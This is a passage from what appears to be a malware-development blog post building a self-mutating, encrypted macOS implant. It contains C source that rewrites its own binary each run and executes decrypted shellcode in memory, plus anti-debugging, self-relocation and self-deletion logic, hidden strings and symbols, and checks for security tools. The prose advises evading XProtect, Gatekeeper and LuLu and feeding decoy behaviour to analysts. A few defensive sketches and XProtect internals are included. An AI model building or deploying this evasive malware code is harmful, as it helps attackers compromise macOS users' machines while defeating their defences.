fprintf(stderr, "Priv op: %s %s\n", ins[i].mnemonic, ins[i].op_str);
priv = true;
break;
}
}
#elif defined(ARCH_ARM)
cs_detail *d = ins[i].detail;
for (size_t j = 0; j < d->groups_count; j++) {
if (d->groups[j] == CS_GRP_PRIVILEGE) {
fprintf(stderr, "Priv op: %s %s\n", ins[i].mnemonic, ins[i].op_str);
priv = true;
break;
}
}
#endif
if (priv) break;
}
} else { fprintf(stderr, "Disasm fail\n"); priv = true; }
cs_free(ins, cnt);
cs_close(&h);
return priv;
}
/* Make code executable and jump */
void execute(uint8_t *code, size_t sz) {
long ps = sysconf(_SC_PAGESIZE);
if (ps <= 0) { perror("sysconf"); return; }
uintptr_t addr = (uintptr_t)code, start = addr & ~(ps - 1);
size_t off = addr - start, tot = off + sz, al = (tot + ps - 1) & ~(ps - 1);
if (mprotect((void *)start, al, PROT_READ | PROT_EXEC) != 0) { perror("mprotect"); return; }
#if defined(__arm__) || defined(__aarch64__)
__builtin___clear_cache((char *)code, (char *)code + sz);
#endif
if (check_priv(code, sz))
return;
void (*fn)(void) = (void (*)(void))code;
fn();
}
/* Relocate if running in non-dir */
void whereuat() {
char exe_path[1024];
uint32_t size = sizeof(exe_path);
_NSGetExecutablePath(exe_path, &size);
if (strstr(exe_path, "/tmp/") != NULL) {
return;
} else if (strstr(exe_path, "/Downloads/") != NULL) {
char *base = strrchr(exe_path, '/');
if (!base) base = exe_path; else base++;
char tmp_path[1024];
snprintf(tmp_path, sizeof(tmp_path), "/tmp/%s", base);
FILE *source = fopen(exe_path, "rb");
if (!source) { perror("fopen source"); exit(1); }
FILE *dest = fopen(tmp_path, "wb");
if (!dest) { perror("fopen dest"); fclose(source); exit(1); }
char buf[4096];
size_t n;
while ((n = fread(buf, 1, sizeof(buf), source)) > 0) {
if (fwrite(buf, 1, n, dest) != n) { perror("fwrite"); fclose(source); fclose(dest); exit(1); }
}
fclose(source); fclose(dest);
chmod(tmp_path, 0755);
char *args[] = {tmp_path, NULL};
execv(tmp_path, args);
perror("execv");
exit(1);
} else {
fprintf(stderr, "%s\nDie.\n", exe_path);
if (unlink(exe_path) != 0) { perror("unlink"); }
exit(1);
}
}
/* Constructor: init, mutate & run payload */
__attribute__((constructor)) static void _entry() {
whereuat();
unsigned long ds = 0;
uint8_t *dsec = getsectiondata(&_mh_execute_header, "__DATA", "__fdata", &ds);
if (!dsec || ds < sizeof(data)) exit(1);
Encryption *hdr = (Encryption *)dsec;
uint8_t *payload = dsec + sizeof(Encryption);
if (hdr->count == 0) {
printf("Initializing...\n");
uint8_t init[P];
memset(init, 0x90, P);
if (len > P) { fprintf(stderr, "what she said\n"); exit(1); }
memcpy(init, dummy, len);
if (getentropy(hdr->key, K) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) exit(1);
cipher(hdr->key, hdr->iv, init, payload, P);
CC_SHA256(payload, P, hdr->hash);
save(dsec, sizeof(data));
hdr->count = 1;
}
ChaCha rng;
chacha20_init(&rng, (uint8_t *)&hdr->seed, sizeof(hdr->seed));
uint8_t *dec = malloc(P);
if (!dec) return;
decipher(hdr->key, hdr->iv, payload, dec, P);
uint8_t comp[CC_SHA256_DIGEST_LENGTH];
CC_SHA256(payload, P, comp);
if (memcmp(hdr->hash, comp, CC_SHA256_DIGEST_LENGTH) != 0) { free(dec); exit(1); }
mutate_payload(dec, P, &rng);
if (getentropy(hdr->key, K) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
fprintf(stderr, "Key/IV error\n");
zer(dec, P);
free(dec);
return;
}
cipher(hdr->key, hdr->iv, dec, payload, P);
CC_SHA256(payload, P, hdr->hash);
save(dsec, sizeof(data));
void *code_ptr;
if (posix_memalign(&code_ptr, P, P) != 0) { free(dec); return; }
if (mprotect(code_ptr, P, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) { perror("mprotect"); free(code_ptr); free(dec); return; }
_memcpy(code_ptr, dec, P);
if (mprotect(code_ptr, P, PROT_READ | PROT_EXEC) != 0) { perror("mprotect"); free(code_ptr); free(dec); return; }
execute(code_ptr, P);
free(code_ptr);
zer(dec, P);
free(dec);
hdr->seed = chacha20_random(&rng);
hdr->count++;
}
The engine targets Mach-O binaries (macOS/ARM64/x86_64) and runs on Capstone disassembly, paired with a ChaCha20-based PRNG. It messes with the payload by swapping instructions, injecting junk code and opaque predicates, then re-encrypts the modified payload with fresh AES keys before slapping it back into the binary.
When you feed a chunk of binary data into Capstone, it disassembles it into a set of instructions, each with details such as its mnemonic (like mov or jmp), operands, and the size of the instruction in bytes. After the engine performs a mutation (say, an instruction swap), it needs to check that the mutated code is still valid. This is where Capstone steps in.
“Cap is a framework that takes raw machine code (binary bytes) and translates it into human-readable assembly instructions. Think of it as a translator for your binary code.” I picked Capstone for this example because it’s a solid disassembler and pretty simple to implement.
Finally, it loads the mutated payload into executable memory and hands over control, so every run spits out a fresh piece of code. Back to basics. Every Mach-O file has a header, load commands, and segments (like __TEXT for code and __DATA for writable data):
__TEXT segment
- __stubs section
- __stub_helper section
- __cstring section
- __unwind_info section
__DATA segment
- __nl_symbol_ptr section
- __la_symbol_ptr section
The header (as shown earlier) and the load commands map out our Mach-O file, defining where each segment sits in memory. The __TEXT segment holds the executable code. It’s mostly read-only and contains stubs, helpers, and other key structures. The __DATA segment is the writable zone, used for data that can change at runtime, like pointers, symbol tables, and other info.
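To make the layout concrete, here’s a minimal sketch that walks the load commands of a Mach-O image already sitting in a buffer and prints each segment. It’s not part of the engine. The names (mh64_t, lc_t, seg64_t, list_segments, and the trailing-underscore constants) are mine, trimmed-down stand-ins for what <mach-o/loader.h> gives you on a Mac, so treat it as an illustration and not the real headers.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption: minimal local copies of the 64-bit Mach-O structures so the
 * sketch also builds off macOS. On a Mac, use <mach-o/loader.h> instead. */
#define MH_MAGIC_64_   0xfeedfacfu
#define LC_SEGMENT_64_ 0x19u

typedef struct {
    uint32_t magic, cputype, cpusubtype, filetype;
    uint32_t ncmds, sizeofcmds, flags, reserved;
} mh64_t;

typedef struct {
    uint32_t cmd, cmdsize;
} lc_t;

typedef struct {
    uint32_t cmd, cmdsize;
    char     segname[16];
    uint64_t vmaddr, vmsize, fileoff, filesize;
    uint32_t maxprot, initprot, nsects, flags;
} seg64_t;

/* Walk the load commands of an in-memory Mach-O image and print every
 * LC_SEGMENT_64 entry. Returns the segment count, or -1 if the buffer is
 * not a well-formed 64-bit Mach-O in host byte order. */
int list_segments(const uint8_t *buf, size_t len) {
    mh64_t hdr;
    assert(buf != NULL);
    if (len < sizeof(hdr)) return -1;
    memcpy(&hdr, buf, sizeof(hdr));
    if (hdr.magic != MH_MAGIC_64_) return -1;

    size_t off = sizeof(hdr);   /* load commands start right after the header */
    int found = 0;
    for (uint32_t i = 0; i < hdr.ncmds; i++) {
        lc_t lc;
        if (len - off < sizeof(lc)) return -1;
        memcpy(&lc, buf + off, sizeof(lc));
        /* cmdsize must cover at least the generic header and stay in bounds */
        if (lc.cmdsize < sizeof(lc) || lc.cmdsize > len - off) return -1;
        if (lc.cmd == LC_SEGMENT_64_) {
            seg64_t seg;
            if (lc.cmdsize < sizeof(seg)) return -1;
            memcpy(&seg, buf + off, sizeof(seg));
            printf("%.16s fileoff=%llu filesize=%llu nsects=%u\n",
                   seg.segname,
                   (unsigned long long)seg.fileoff,
                   (unsigned long long)seg.filesize,
                   seg.nsects);
            found++;
        }
        off += lc.cmdsize;      /* next command sits cmdsize bytes further on */
    }
    return found;
}
```

Hand it the bytes of any thin 64-bit Mach-O and you get one line per segment; anything with the wrong magic or a truncated command table comes back as -1.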
In the piece above, we take advantage of the __DATA segment’s writable nature by carving out our own custom section, __fdata. This section holds an encryption header (containing the AES key, IV, random seed, run counter, and hash) alongside the encrypted payload, which is our self-mutating code.
Why do it like this? Simple. We can find our custom section at runtime using standard Mach-O APIs (like getsectiondata), much like opening a labeled folder. The engine decrypts the payload, mutates it (instruction swaps, junk code, etc.), re-encrypts it, and writes it back, ensuring dynamic evolution with every run. This is polymorphic, and also metamorphic in a sense. Keep that in mind.
So essentially what’s happening is that we copy the decrypted, mutated payload into executable memory and then transfer control over to it. Running this newly mutated payload is the final step in self-modification: it lets the engine execute its current, evolved version of the code. Plus, the engine checks its execution location (like making sure it’s running from /tmp) and might even relocate itself if it finds itself in ~/Downloads (more on that later). This setup minimizes external interference and ensures the piece can modify itself without any constraints.
For encryption, we kick things off by prepping a default payload “dummy” routine and we fill out the rest with NOPs. That leaves us with a clean slate to work on. Then we tap into a randomness source to snag an AES key and an IV. Now, these have their pros and cons: on the upside, they turn our piece into a moving target, but on the downside, the binary’s entropy can skyrocket as more payload and mechanisms get crammed in. Keep that in mind.
Every time the engine runs after initialization, the process looks like this: the engine reads the encrypted payload from the __fdata section and uses the stored key and IV to decrypt it. It then recomputes the SHA-256 hash over the stored (still encrypted) payload and compares it to the one in the header. This simple check makes sure the payload hasn’t been tampered with.
Now, it might seem straightforward, but here’s the twist: since the payload for real malware is gonna keep growing, we ain’t gonna settle for a “dummy” payload. Instead, we’re packing it with sets of functioning operations, making it a real challenge to keep track of everything.
Remember the first part, where we dabbled in assembly and macOS shellcode development? The same idea applies here. Whether our payload is a simple machine-code “Hello World” or a whole suite of operations doesn’t really matter for our current use; it’s all about laying the groundwork for something more dynamic down the line.
// Encrypt the mutated payload
cipher(hdr->key, hdr->iv, dec, payload, P);
// Update the hash for integrity verification next time
CC_SHA256(payload, P, hdr->hash);
// Save the new encrypted payload back to the __fdata section
save(dsec, sizeof(data));
So every run, the engine decrypts its payload, verifies and mutates it, then locks it down again with fresh encryption. This cycle makes the engine’s behavior unpredictable:
Decrypt → Verify → Mutate → Generate new keys → Re-encrypt → Update → Save back.
Now the mutation phase. We might swap two instructions, insert junk code (like NOPs or push/pop sequences), or replace some instructions with opaque predicates. Imagine the engine decides to swap two instructions: it picks two instructions of equal size from the payload, swaps them, and then needs to make sure the resulting code still makes sense.
So why? It’s not just about creating a new, unique copy of itself every time it propagates. It’s also about disassembling previously mutated code and keeping its size in check. (Since instructions can mutate into multiple instructions, messing with this can cause the executable to grow exponentially with every mutation, fun, right?) A simple mistake in disassembly can break the whole thing. Keeping it running smoothly makes the malware a lot tougher to kill. It’s a challenge and a real REpsych.
[SETUP]
~$ clang -o trustme mutator.c -framework Foundation
-w -lcrypto -lcapstone
[RELEASE MODE]
~$ vx=trustme
[INITIAL]
~$ echo $vx | xargs -I {} sh -c 'shasum {}; hexdump {} | head -n 1; file {}'
94bf45eac2e3bba045a922ddccab65f18f063375 trustme
0000000 facf feed 0007 0100 0003 0000 0002 0000
trustme: Mach-O
[PRE-EXECUTION STATE]
~$/tmp> ls -al
total 0
[POST-EXECUTION]
~$/tmp> ls -al
total 104
-rwxr-xr-x 1 user staff 104 trustme // can be random.
[POST-MUTATION]
~$/tmp> echo $vx | xargs -I {} sh -c 'shasum {}; hexdump {} | head -n 1; file {}'
d7092ed32159874d92c49a789b25932dc51497f5 trustme
0000000 facf feed 0007 0100 0003 0000 0002 0000
trustme: Mach-O
So, why go with mutation? Why not just use raw malware? With macOS’s security features like Gatekeeper, XProtect, and SIP (System Integrity Protection), one might argue that it’s pointless: Why bother with polymorphic malware? Isn’t it basically useless on macOS?
There’s some truth to that. If the malware never makes it to execution, it doesn’t matter if it’s polymorphic, metamorphic, or totally unprotected. That binary is either heading to the trash or, worse, into the hands of analysts. ;)
As one may say:
“If your objective does not require a high success rate and your time is limited, you can code something that isn’t protected at all and simply use it as-is.”
— Evolution of Polymorphic Malware
Back in the day, and still today, AV and EDR solutions lean hard on static analysis. They hunt with pattern matching against known byte sequences (YARA rules and the like), heuristics that scan instruction patterns and control flow, string-based checks on API calls and library imports, plus entropy analysis to sniff out packed or encrypted sections. Throw in hash checks and structural scans of PE or Mach-O headers and sections, and you’ve got the usual toolkit. Some even try behavioral pattern recognition based solely on static code.
But here’s the catch: all these methods share the same blind spot. They bank on the idea that code’s structure stays constant across every copy. Like a fingerprint, malicious code is assumed to keep its core shape no matter when or where it shows up.
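To see why exact-match signatures are brittle, here’s a tiny scanner-side sketch: a naive byte-signature search. find_signature is a hypothetical helper, not anything XProtect or a real AV ships. Real engines use smarter rules, but the assumption being illustrated is the same one: the bytes have to show up unchanged.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the offset of the first occurrence of the
 * byte signature `sig` inside `buf`, or -1 if it never appears. */
long find_signature(const uint8_t *buf, size_t len,
                    const uint8_t *sig, size_t siglen) {
    assert(buf != NULL && sig != NULL);
    if (siglen == 0 || siglen > len) return -1;
    /* Slide a window over the buffer and compare byte-for-byte. */
    for (size_t i = 0; i + siglen <= len; i++) {
        if (memcmp(buf + i, sig, siglen) == 0) return (long)i;
    }
    return -1;
}
```

A buffer that contains the signature bytes matches at its offset; change a single byte inside that window and the same call returns -1, even though nothing else about the file moved.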
AIN’T GONNA FLY
All these old-school static checks are exactly what Apple’s XProtect banks on: heavy reliance on static signatures to catch known threats. So I started wondering: how well does XProtect really hold up against a shape-shifting binary? Apple says their detection uses generic rules, not just fixed hashes, to snatch unseen variants. But honestly? I was skeptical. So, let’s crack open XProtect’s guts while it’s still fresh in my head.
When you open a file, by double-click or from the terminal, LaunchServices kicks in and sends an XPC message to CoreServicesUIAgent, the UI handler for app launches. From there, CoreServicesUIAgent calls XprotectService.xpc, located inside the XProtectFramework:
/System/.../XprotectService (x86_64): Mach-O 64-bit executable
/System/.../XprotectService (arm64e): Mach-O 64-bit executable
Two main players in this story: Gatekeeper (XPGatekeeperEvaluation) and XProtect (XProtectAnalysis). Gatekeeper handles code-signing, notarization, and policy enforcement. XProtect does the dirty work, core malware scanning, running in its own XPC sandbox for isolation.
Everything starts with the assessmentContext. When a file’s about to open, Gatekeeper builds a dossier on it, an NSMutableDictionary called assessmentContext. That thing holds all the juicy metadata: file type under kSecAssessmentContextKeyUTI, origin URL if it was downloaded (LSDownloadDestinationURLKey), and whether the file’s been notarized (assessmentWasNotarized). This context becomes the deciding factor for what happens next.
Inside the binary, execution paths are sorted by operation type (execute, install, open) with a straight cmp against constants:
cmp eax, 0x2
je loc_100006f3a
cmp eax, 0x1
je loc_100006f64
...
mov rax, qword [_kSecAssessmentOperationTypeExecute_1000140c8]
From there, the context gets filled out with Objective-C message calls. For example, loading the UTI and stuffing it into the dictionary:
mov rdx, qword [r13+rax] ; Load UTI
mov rax, qword [_kSecAssessmentContextKeyUTI_1000140c0]
mov rcx, qword [rax]
mov rdi, r14 ; dictionary
mov rsi, r12 ; selector: setObject:forKey:
call rbx ; objc_msgSend
It even tries to pull a separate download assessment dictionary if one exists. That tells you how deep the inspection pipeline goes, this isn’t just a surface-level check, it’s context-driven and pretty granular.
Once the assessmentContext is in place, XProtectService moves into policy eval mode. It pulls in XProtect’s rule files, XProtect.plist and XProtect.meta.plist, using CoreFoundation APIs and parses them into memory.
From there, it starts matching rules against file attributes: UTI, path, quarantine flags, code signature data. Everything gets checked to figure out if the file fits any known threat pattern.
Notarization status comes from cached flags, not any live verification. You see it in the binary:
movsx eax, byte [rdi+rax] ; notarization flag
That shortcut keeps things fast, but it means the decision relies on whatever data was already there, no real-time notarization lookup happening.
XProtect doesn’t do the scanning itself. Instead, it delegates to com.apple.XprotectFramework.AnalysisService over XPC, Apple’s interprocess communication layer. That separation keeps the scanning sandboxed, reducing the risk of crashes or exploits hitting the main system.
Inside the service, analysis kicks off by resolving aliases and symlinks before touching file content. It checks things like quarantine flags, walking through the metadata before digging deeper:
-[XProtectAnalysis beginAnalysisWithHandler:...]:
mov rax, [_NSURLIsAliasFileKey]
mov rax, [_NSURLIsSymbolicLinkKey]
call objc_msgSend ; arrayWithObjects:count:
Once scanning wraps, the file gets tagged with metadata like XProtectMalwareType, and the results are kicked back to CoreServicesUIAgent.
If a file gets flagged, CoreServicesUIAgent steps in, flashes an alert, and dumps it in the Trash, even if it’s signed and looks clean on the surface.
Why this matters:
CoreServicesUIAgent uses identifiers like XProtectMalwareType to classify and act on files. But that whole system depends on static signatures. Mutating binaries that shift shape with every execution? They throw a wrench in the pattern-matching logic and can easily slide past unnoticed.
So is that it? Hell nah.
macOS stacks its defenses, each layer designed to slow you down, throw you off, or straight up brick your flow. Sure, mutation can knock out XProtect’s static signature checks, but that’s just one wall. There’s still runtime behavioral monitoring, network traffic inspection, and system-level policy enforcement. And yeah this assumes you’re actually dropping a payload, because otherwise… what’s the point?
Let’s say your payload phones home (and it probably does). Now you’ve got Objective-See’s LuLu firewall to contend with, if the user has it installed, it’ll flag any unexpected outbound connection.
And Gatekeeper? It’s focused on code signing and notarization. If your binary is signed, even self-signed, and the quarantine bit’s removed, Gatekeeper mostly stands down, trusting XProtect to catch the threat. But again, if you mutate, XProtect can’t match what it’s never seen.
System Integrity Protection (SIP) locks down system directories, sure. But malware doesn’t need /System to do damage. You live in userland: ~/Library, ~/Library/LaunchAgents, ~/Library/Containers. That’s where real infections happen now, quietly, persistently.
The trick? Don’t look like malware. Avoid sketchy API calls, skip the obvious telltale signs. Write like legit software. You can sign your own binaries. You can build trust chains. Because in the end, malware is just software; the rules are the same, you’re just bending them.
ANTI ANALYSIS
Normally, this part comes later. But I think it’s better to kick things off here, since the first thing our code does is mutate and check if it’s running in a hostile environment, its way of protecting itself. (Honestly, that topic deserves its own article.)
Anti-analysis techniques are pretty consistent across operating systems; only the implementation details change. In Part One, we covered classic stealth moves like process injection, in-memory execution, and even wrote our own versions. Remember how we hardcoded everything: strings, file paths, C2 addresses? Yeah, that needs to change. Let’s look at some better options.
Instead of hardcoding strings, we can dynamically generate them at runtime by concatenating smaller fragments or assembling them based on certain conditions. It does make the code messier, sure. Alternative? Encryption, dude.
You might start simple with XOR. But since XOR is easily reversible, it’s smarter to mix it with other methods. For example, encrypt the strings with AES. Just remember: if your decryption key is hardcoded into the binary, you basically did nothing.
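To back up the “easily reversible” claim from the analyst’s side, here’s a rough sketch that brute-forces a single-byte XOR key using a known plaintext fragment (a crib). xor_buf and recover_xor_key are hypothetical helper names, and the single-byte key is an assumption to keep the example short.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* XOR every byte of buf with a single-byte key. Encoding and decoding are
 * the same operation, which is exactly the weakness. */
void xor_buf(uint8_t *buf, size_t len, uint8_t key) {
    for (size_t i = 0; i < len; i++) buf[i] ^= key;
}

/* Hypothetical analyst helper: try all 256 keys and return the first one
 * under which the decoded buffer contains `crib`. Returns -1 if none does. */
int recover_xor_key(const uint8_t *enc, size_t len, const char *crib) {
    assert(enc != NULL && crib != NULL);
    size_t clen = strlen(crib);
    if (clen == 0 || clen > len) return -1;
    for (int key = 0; key < 256; key++) {
        for (size_t off = 0; off + clen <= len; off++) {
            size_t j = 0;
            /* Decode on the fly and compare against the crib. */
            while (j < clen &&
                   (uint8_t)(enc[off + j] ^ (uint8_t)key) == (uint8_t)crib[j]) {
                j++;
            }
            if (j == clen) return key;
        }
    }
    return -1;
}
```

With only 256 candidate keys, a guess like "server" or "http" is usually all it takes, which is why plain XOR only stops a strings dump and not an analyst.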
Even with encryption, the malware still has to decode and decrypt strings to actually use them, like when it needs to connect to its C2 server for instructions. That’s the catch: you can just let the malware run and catch the decrypted C2 address when it tries to connect.
To show this, I threw together a basic AES encryption and decryption routine using tiny-AES-c. For encryption, I set up the AES context with a fixed key and processed the input string in 16-byte blocks, dumping the output into a buffer. Decryption is just the same in reverse, using the same key to get back the original data. Pretty basic, yeah but now let’s toss it into a debugger and watch where the decrypted string shows up.
The play is simple: pause the malware right after it tries to decrypt a string and dig into its memory.
(lldb) image lookup -s decrypt
spit`decrypt: 0x100002140
(lldb) breakpoint set --name decrypt
Breakpoint 1: address = 0x100002140
(lldb) r
Encrypted: 16 90 bc 53 eb 9c 8a 8b db 04 a1 81 ca b9 47 ad
* thread #1, stop reason = breakpoint 1.1
frame #0: 0x100002140 spit`decrypt
(lldb) register read rsi
rsi = 0x7ff7bfeff820
(lldb) x/16xb $rsi
0x7ff7bfeff820: 66 6f 6f 2d 6f 70 65 72 61 74 6f 72 2d 73 65 72
(lldb) continue
Decrypted: foo-operator-server
I set a breakpoint in the decrypt function to track the decryption process. First, I ran image lookup -s decrypt to find the memory address of the function, because I already knew the target. In a real-world binary, this step comes after static analysis, since most binaries won’t have symbols at this stage. Anyway, it showed up at 0x0000000100002140. Then, I set a breakpoint with breakpoint set --name decrypt, so execution halts whenever we hit that function. Running the program (r) paused it right at the breakpoint, giving me a chance to check out the registers and memory.
For example, the instruction pointer (rip) confirmed we were at the start of the decryption routine. I also peeked at the memory at the address pointed to by rsi (using x/16xb $rsi), which was all zeros at first, meaning the decrypted data hadn’t been written yet. After continuing with continue, the decrypted string foo-operator-server appeared.
This setup was done to show how it works in the debugger, but the idea is the same in a dynamic analysis. You could also hook up a network monitor to passively recover the previously encrypted address of the C2 server when the malware beacons out for tasking. You can achieve similar results with a debugger. Remember Objective-See? Yeah, same idea.
At that point, the user can block it, dump it, or just drop it into VirusTotal and nuke the whole binary on sight. One way around that is checking for analysis tools before doing any decryption. Most of these tools live in user space or as helper processes, easy to spot, sometimes easy to kill. If we can’t kill them, we just nope out, no trace. We’ll circle back to that later.
If you look at the visual output, you probably noticed the debugger jumps in before main() even starts. That’s early execution: anti-analysis checks firing off at load time. We pull it off using __attribute__((constructor)), which runs our code as soon as the binary loads. So if someone’s tracing or debugging, they’re already late. main() hasn’t even clocked in yet.
This is where you toss in the lightweight stuff: anti-debugging, emulator checks, VM flags. I skip most of that in Aether ‘cause it’s kinda loud. Feels like yelling “Hey, I’m malware!” before you even do anything. Instead, it’s smarter to keep it simple, just scan for active reversers or tools before handing off to main().
Later, right before execution, we handle mutation. That’s when the payload decrypts only in memory, only when needed. No lingering strings, no blobs in the binary. You see this a lot in malware: once it lands, it unpacks everything at once, basically gift-wrapping it for the analyst.
We kick off with a _once(), just a lazy way to seed rand() with some semi-unique entropy. Nothing wild, but enough to randomize the junk ahead.
Now the real magic happens in symbol_i(). It dynamically builds the string "sysctl" without ever writing it directly. Instead, it does some pseudo-random XOR games with byte math. Basic, sure, but just enough to dodge string detection. Two slightly different ways to encode the same result, chosen at runtime. That alone breaks a bunch of simple static scanners.
This key k is used to mangle the bytes. Either straight XOR or offset XOR with k + i. So unless you’re actually executing this code and tracing memory, you don’t see "sysctl" anywhere.
Then getsys() uses dlsym() to resolve the actual sysctl function at runtime. No import, no symbol, no trace, just a function pointer built on the fly.
cached = (sysctl_fn) dlsym(RTLD_DEFAULT, symbol);
De() runs before main() thanks to __attribute__((constructor)).
Inside De(), it calls sysctl() with KERN_PROC_PID on its own PID. If the returned kinfo_proc.p_flag has P_TRACED set, that means we’re being debugged.
And if that’s the case?
panic();
Up to this point, we just panic, meaning the process kills itself on trace detection. But a smarter move? Swap the real behavior with a decoy. Instead of bailing, you let the malware play dumb. Show fake activity, mimic something benign, give the reverser something to chase that leads nowhere. Make them think this is the intended execution path.
Basically: if we’re being watched, lie.
I actually did that in a small crackme called Shiftr. Same idea if you’re tracing it, you get fed a fake routine. Looks like it’s running legit logic, but under the hood? nah. Check it out if you’re curious.
Another trick we pull is figuring out where the thing is running. Using _NSGetExecutablePath, we check the binary’s actual path at runtime, because yeah, behavior should change based on context. Unlike Windows, where you can just yank environment variables, macOS makes you work for it. You need system calls to get anything useful.
On Linux, you just peek at /proc/self/exe, done. But macOS is different. The Darwin kernel stashes the path on the stack, tucked right after the envp array when the process boots. dyld, the dynamic linker, grabs it early on and keeps it handy. _NSGetExecutablePath just reaches for that.
if (_NSGetExecutablePath(execPath, &pathSize) != 0)
return;
But the real reason we do this is control. We assume the user runs the malware from ~/Downloads, or something similar. It’s basic, yeah, but it works. The idea is: no proper environment, no execution.
It’s just one more layer, because obfuscation isn’t optional. It is the code. And reverse engineering? That’s not a side effect of malware development. It’s part of the process.
+-------------------+
| Start |
+-------------------+
|
v
+-------------------+
| Anti-Debug Check |
+-------------------+
|
[Debugger?]
/ \
Yes No
| |
v v Later on:
[Self-Destruct] +----------------------+
| Objective-See Check |
+----------------------+
|
[Detected?]
/ \
Yes No
| |
v v
[Self-Destruct] +------------------+
| Main Routine |
+------------------+
All the AV tool paths? Yeah, those are encrypted in the binary. We decrypt them at runtime, one by one, and check if they exist in the system. If anything sketchy shows up (any known analysis tool, Objective-See product, whatever), the binary panics. Self-corrupts.
Yeah, I did think about going full scorched earth looping to kill the AV tool on every run, forcing a reboot, maybe some classic process injection games. But nah. Sometimes it’s cleaner that way.
Self-Modifying
I kinda explained this in the architecture already, but if you weren’t paying attention, let me walk through it using the Aether code as the example. Watch how it rewrites itself every time it runs, keeping the original behavior untouched. Each execution spits out a fresh binary same logic, totally different under the hood.
It takes advantage of the Mach-O file format to stash and tweak the payload:
+-----------------------------------------------------+
| Mach-O File |
+-----------------------------------------------------+
| Header |
| - Magic, CPU type, file type, etc. |
+-----------------------------------------------------+
| Load Commands |
| - Define segments (__TEXT, __DATA) |
+-----------------------------------------------------+
| Segments |
| +-------------------+ +-----------------------+ |
| | __TEXT | | __DATA | |
| | (Executable code) | | (Writable payloads) | |
| +-------------------+ +-----------------------+ |
+-----------------------------------------------------+
The encrypted payload lives in a custom writable __fdata section within the __DATA segment. This section holds an encryption header packing the AES key (key), AES IV (iv), ChaCha20 seed (seed), mutation counter (count), and a SHA-256 hash (hash).
Right after that comes the encrypted, self-mutating payload itself.
typedef struct __attribute__((packed)) {
uint8_t key[KEY_SIZE];
uint8_t iv[kCCBlockSizeAES128];
uint64_t seed;
uint32_t count;
uint8_t hash[CC_SHA256_DIGEST_LENGTH];
} enc_header_t;
This layout lets the payload be accessed directly and in-place, so it can be decrypted, mutated, and re-encrypted right at runtime. To find it, the code parses Mach-O load commands and sections using this approach:
uint64_t findSectionOffset(struct mach_header_64 *header, const char *sectName, const char *segName, size_t requiredSize) {
struct load_command *lc = (struct load_command*)((char*)header + sizeof(*header));
for (uint32_t i = 0; i < header->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_64) {
struct segment_command_64 *seg = (struct segment_command_64*)lc;
struct section_64 *sec = (struct section_64*)((char*)seg + sizeof(*seg));
for (uint32_t j = 0; j < seg->nsects; j++) {
if (!strcmp(sec[j].sectname, sectName) && !strcmp(sec[j].segname, segName)) {
if (requiredSize > sec[j].size) return 0;
return sec[j].offset;
}
}
}
lc = (struct load_command*)((char*)lc + lc->cmdsize);
}
return 0;
}
Writing the mutated payload back: after mutation, the payload is written back into the __fdata section, overwriting the binary on disk:
int writeDataAtOffset(int fd, uint64_t offset, const uint8_t *data, size_t size) {
if (lseek(fd, offset, SEEK_SET) == -1) { perror("lseek"); return -1; }
size_t totalWritten = 0;
while (totalWritten < size) {
ssize_t w = write(fd, data + totalWritten, size - totalWritten);
if (w <= 0) { perror("write"); return -1; }
totalWritten += w;
}
return totalWritten == size ? 0 : -1;
}
void save_section(uint8_t *data, size_t sz) {
char path[1024] = {0};
uint32_t pathSize = sizeof(path);
if (find_self(path, &pathSize) != 0) return;
int fd = oprw(path);
if (fd < 0) return;
struct mach_header_64 *hdr = &_mh_execute_header;
size_t actual_size = sizeof(enc_header_t) + PAGE_SIZE;
if (sz < actual_size) actual_size = sz;
uint64_t sectionOffset = findSectionOffset(hdr, "__fdata", "__DATA", actual_size);
if (!sectionOffset) { close(fd); return; }
if (writeDataAtOffset(fd, sectionOffset, data, actual_size) != 0) { close(fd); return; }
close(fd);
}
Each time the implant runs, it rewrites itself on disk, creating a fresh binary generation while keeping its original functionality intact. The boot() function triggers only once on the very first execution. It sets up the encrypted payload by preparing a NOP-sled-padded buffer that mixes initial shellcode with junk instructions. This buffer is encrypted using newly generated AES keys and IV, then stored in the __fdata section. The mutation counter is initialized to 1.
From then on, cook() takes over on every subsequent run, carrying out the full mutation cycle by:
- Decrypting the payload with the current AES keys.
- Verifying payload integrity via SHA-256.
- Applying mutations to the shellcode.
- Generating fresh AES keys and IV.
- Re-encrypting the mutated payload.
- Updating the hash and incrementing the mutation counter.
- Writing the mutated payload back into the Mach-O binary.
- Executing the mutated shellcode in memory.
int boot(uint8_t *dsec, size_t ds, chacha_state_t *rng) {
enc_header_t *hdr = (enc_header_t*)dsec;
uint8_t *payload = dsec + sizeof(enc_header_t);
if (hdr->count == 0) {
uint8_t init_buffer[PAGE_SIZE];
memset(init_buffer, 0x90, sizeof(init_buffer)); // NOP sled padding
if (len > sizeof(init_buffer)) return -1;
memcpy(init_buffer, dummy, len); // Copy initial shellcode
size_t entry_protect = 150;
if (len > entry_protect) {
mut_sh3ll(init_buffer + entry_protect, len - entry_protect, rng, hdr->count);
}
#if defined(ARCH_X86)
for (size_t i = len; i + 3 <= PAGE_SIZE; i += 3) {
memcpy(init_buffer + i, x86_junk[chacha20_random(rng) % 20], 3);
}
#elif defined(ARCH_ARM)
for (size_t i = len; i + 4 <= PAGE_SIZE; i += 4) {
memcpy(init_buffer + i, arm_junk[chacha20_random(rng) % 15], 4);
}
#endif
if (getentropy(hdr->key, KEY_SIZE) != 0 || getentropy(hdr->iv, kCCBlockSizeAES128) != 0) {
panic();
}
cipher(hdr->key, hdr->iv, init_buffer, payload, PAGE_SIZE);
CC_SHA256(payload, PAGE_SIZE, hdr->hash);
save_section(dsec, ds);
hdr->count = 1;
#ifdef TEST
hexdump(payload, len, "Init");
#endif
}
return 0;
}
